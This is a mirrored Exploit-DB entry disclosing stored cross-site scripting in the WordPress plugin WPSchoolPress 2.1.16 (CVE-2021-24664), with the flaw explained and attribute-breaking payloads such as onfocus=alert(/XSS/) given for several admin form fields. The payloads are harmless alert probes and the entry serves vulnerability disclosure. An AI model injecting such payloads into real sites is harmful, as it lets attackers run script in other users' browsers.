bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/50520.txt
Offensive Security 412b034ee9 DB: 2021-11-16 
6 changes to exploits/shellcodes

WordPress Plugin WPSchoolPress 2.1.16 - 'Multiple' Cross Site Scripting (XSS)
KONGA 0.14.9 - Privilege Escalation
Simple Subscription Website 1.0 - SQLi Authentication Bypass
Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticated)
WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting (XSS) (Authenticated)
PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)
2021-11-16 05:02:13 +00:00

31 lines
No EOL
2.2 KiB
Text
Raw Blame History

# Exploit Title: WordPress Plugin WPSchoolPress 2.1.16 - 'Multiple' Cross Site Scripting (XSS)
# Date: 20/08/2021
# Exploit Author: Davide Taraschi
# Vendor Homepage: https://wpschoolpress.com/
# Software Link: https://wpschoolpress.com/free-download/
# Version: up to 2.1.17 (non included)
# Tested on: Ubuntu 20.04 over WordPress 5.8 and apache2
# CVE : CVE-2021-24664
# Description:
The plugin sanitise some fields using a wordpress built-in function called sanitize_text_field() but does not correctly escape them before outputting in attributes, resulting in Stored Cross-Site Scripting issues.
The function wp_sanitize_text_field() escape < and > but does not escape characters like ", allowing an attacker to break a HTML input tag and inject arbitrary javascript.
# PoC:
As admin,
- Add a new teacher attendance (/wp-admin/admin.php?page=sch-teacherattendance), Tick the Absent box and put the following payload in the Reason: "style=animation-name:rotation onanimationstart=alert(/XSS/)//
The XSS will be triggered when adding another teacher attendance by clicking on the Add button
- Add a new Student Attendance (/wp-admin/admin.php?page=sch-attendance), tick the Absent box and put the following payload in the Reason: " style=animation-name:rotation onanimationstart=alert(/XSS/)//
The XSS will be triggered when adding another attendance by clicking the 'Add/Update' button
- Add a new Subject Mark Field (/wp-admin/admin.php?page=sch-settings&sc=subField) and put the following payload in the 'Field': " autofocus onfocus=alert(/XSS/)//
The XSS will be triggered when editing the created Subject Mark (ie /admin.php?page=sch-settings&sc=subField&ac=edit&sid=3)
- Create a new Subject (/wp-admin/admin.php?page=sch-subject), with the following payload in the Subject Name field: " autofocus onfocus=alert(/XSS/)//
The XSS will be triggered when editing the Subject
- Create a new Exam (/wp-admin/admin.php?page=sch-exams) with the following payload in the Exam Name Field: " autofocus onfocus=alert(/XSS/)//
The XSS will be triggered when editing the Exam=20
Note that some of this XSS issues can be executed by a teacher (medium-privileged user), but since wordpress uses HTTPonly cookies is impossible to steal cookies.
Reference in a new issue View git blame Copy permalink